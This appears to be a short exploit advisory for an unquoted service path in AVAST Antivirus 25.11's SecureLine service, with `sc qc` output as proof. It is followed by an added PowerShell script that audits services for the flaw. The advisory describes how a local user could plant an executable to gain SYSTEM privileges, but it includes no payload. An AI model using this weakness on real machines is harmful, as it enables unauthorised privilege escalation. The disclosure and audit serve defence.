AVAST Antivirus 25.11 Exploit, Unquoted Service Path

# Exploit Title: AVAST Antivirus 25.11 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Date: 2025-12-17
# Vendor Homepage: https://www.avast.com/
# Software Link: https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
# Tested Version: 25.11
# Tested on OS: Windows 11


Description
AVAST Antivirus 25.11 contains an unquoted service path vulnerability that allows
local non-privileged users to potentially execute code with elevated SYSTEM
privileges. Attackers can exploit the unquoted service path configuration
to inject malicious executables that will be run with high-level system
permissions.



PoC
C:\>sc qc SecureLine
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecureLine
        TIPO : 10 WIN32_OWN_PROCESS
        TIPO_INICIO : 2 AUTO_START
        CONTROL_ERROR : 1 NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
        GRUPO_ORDEN_CARGA :
        ETIQUETA : 0
        NOMBRE_MOSTRAR : Avast SecureLine
        DEPENDENCIAS :
        NOMBRE_INICIO_SERVICIO: LocalSystem
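
A defender-side check for the condition shown in the `sc qc` output above, as an added example that is not part of the original advisory: it flags services whose executable path contains a space and is not quoted, and prints the quoted form of each. The function names `Test-UnquotedServicePath` and `Get-QuotedServicePath` are hypothetical, and the script assumes Windows with PowerShell 3.0 or later.

```powershell
# Added example: audit for unquoted service paths (function names are hypothetical).
function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return $false }    # already quoted
    $opt = [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
    # Executable portion: shortest prefix ending in ".exe" followed by whitespace or end of string.
    $m = [regex]::Match($p, '^(?<exe>.+?\.exe)(?=\s|$)', $opt)
    if (-not $m.Success) { return $false }       # kernel drivers and other non-.exe entries are out of scope
    return $m.Groups['exe'].Value.Contains(' ')  # space inside an unquoted executable path
}

function Get-QuotedServicePath {
    param([Parameter(Mandatory)][string]$PathName)
    $opt = [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
    # Wrap only the executable portion in quotes; any arguments stay as they were.
    return [regex]::Replace($PathName.Trim(), '^(?<exe>.+?\.exe)(?=\s|$)', '"${exe}"', $opt)
}

# Offline check on sample values.
$samples = @(
    'C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe',  # binary path from the sc qc output above
    'C:\Windows\System32\svchost.exe -k netsvcs'              # constructed sample, no space in the exe path
)
foreach ($s in $samples) {
    [pscustomobject]@{ PathName = $s; Unquoted = (Test-UnquotedServicePath $s) }
}

# Live audit of the local machine: every service with an unquoted path containing a space.
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -and (Test-UnquotedServicePath $_.PathName) } |
    Select-Object Name, StartMode, StartName, PathName,
        @{ Name = 'SuggestedImagePath'; Expression = { Get-QuotedServicePath $_.PathName } }
```

The suggested value corresponds to the service's `ImagePath` entry under `HKLM\SYSTEM\CurrentControlSet\Services\<service name>`.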
